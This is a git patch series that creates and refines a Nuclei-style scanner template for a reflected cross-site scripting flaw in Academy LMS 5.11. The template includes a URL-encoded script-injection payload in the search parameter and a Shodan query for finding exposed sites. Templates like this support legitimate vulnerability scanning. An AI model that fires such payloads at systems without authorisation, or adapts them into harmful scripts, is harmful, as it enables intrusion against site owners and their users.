From ea6e61448dbdd20671daa12c336f9144e2cce92b Mon Sep 17 00:00:00 2001
From: Cryptoc0nman <54571841+cryptoconman@users.noreply.github.com>
Date: Mon, 23 Jan 2023 00:02:57 +0530
Subject: [PATCH 1/3] Create alms-xss
---
vulnerabilities/other/alms-xss | 32 ++++++++++++++++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100644 vulnerabilities/other/alms-xss
diff --git a/vulnerabilities/other/alms-xss b/vulnerabilities/other/alms-xss
new file mode 100644
index 0000000000..4179e6a857
--- /dev/null
+++ b/vulnerabilities/other/alms-xss
@@ -0,0 +1,32 @@
+id: alm
+
+info:
+ name: Academy Learning Management System v5.1.1 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ Academy Learning Management System contains a reflected cross-site scripting vulnerability via the Search parameter.
+ reference:
+ - https://packetstormsecurity.com/files/170514/Academy-LMS-5.11-Cross-Site-Scripting.html
+ metadata:
+ shodan-query: http.html:"Academy LMS"
+ verified: "true"
+ tags: xss,lms
+
+requests:
+ - raw:
+ - |
+ GET /search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+ Host: {{Hostname}}
+
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - ''
From 243b12571c3cea880584d3d5ffdebd5c58f037a3 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Mon, 23 Jan 2023 10:57:54 +0530
Subject: [PATCH 2/3] matcher-update
added additional data to keep the template uniform
---
.../other/{alms-xss => academy-lms-xss.yaml} | 29 ++++++++++---------
1 file changed, 15 insertions(+), 14 deletions(-)
rename vulnerabilities/other/{alms-xss => academy-lms-xss.yaml} (61%)
diff --git a/vulnerabilities/other/alms-xss b/vulnerabilities/other/academy-lms-xss.yaml
similarity index 61%
rename from vulnerabilities/other/alms-xss
rename to vulnerabilities/other/academy-lms-xss.yaml
index 4179e6a857..65a7a563f8 100644
--- a/vulnerabilities/other/alms-xss
+++ b/vulnerabilities/other/academy-lms-xss.yaml
@@ -1,32 +1,33 @@
-id: alm
+id: academy-lms-xss
info:
- name: Academy Learning Management System v5.1.1 - Cross-Site Scripting
+ name: Academy LMS 5.11 Cross Site Scripting
author: arafatansari
severity: medium
description: |
Academy Learning Management System contains a reflected cross-site scripting vulnerability via the Search parameter.
reference:
- https://packetstormsecurity.com/files/170514/Academy-LMS-5.11-Cross-Site-Scripting.html
- metadata:
+ - https://vulners.com/packetstorm/PACKETSTORM:170514
+ metadata:
shodan-query: http.html:"Academy LMS"
verified: "true"
- tags: xss,lms
+ tags: xss,lms,academy
requests:
- - raw:
- - |
- GET /search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
- Host: {{Hostname}}
-
+ - method: GET
+ path:
+ - "{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and
matchers:
- - type: status
- status:
- - 200
-
- - type: word
+ - type: word
part: body
words:
- ''
+ - 'Academy LMS'
+ condition: and
+
+ - type: status
+ status:
+ - 200
From 095df8edcc43d3aafab47a4bd4705d31589a1708 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 23 Jan 2023 15:24:33 +0530
Subject: [PATCH 3/3] updated matchers
---
vulnerabilities/other/academy-lms-xss.yaml | 11 ++++++++---
1 file changed, 8 insertions(+), 3 deletions(-)
diff --git a/vulnerabilities/other/academy-lms-xss.yaml b/vulnerabilities/other/academy-lms-xss.yaml
index 65a7a563f8..baefca419a 100644
--- a/vulnerabilities/other/academy-lms-xss.yaml
+++ b/vulnerabilities/other/academy-lms-xss.yaml
@@ -1,7 +1,7 @@
id: academy-lms-xss
info:
- name: Academy LMS 5.11 Cross Site Scripting
+ name: Academy LMS 5.11 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
@@ -10,9 +10,9 @@ info:
- https://packetstormsecurity.com/files/170514/Academy-LMS-5.11-Cross-Site-Scripting.html
- https://vulners.com/packetstorm/PACKETSTORM:170514
metadata:
- shodan-query: http.html:"Academy LMS"
verified: "true"
- tags: xss,lms,academy
+ shodan-query: http.html:"Academy LMS"
+ tags: lms,academy,xss
requests:
- method: GET
@@ -28,6 +28,11 @@ requests:
- 'Academy LMS'
condition: and
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
- type: status
status:
- 200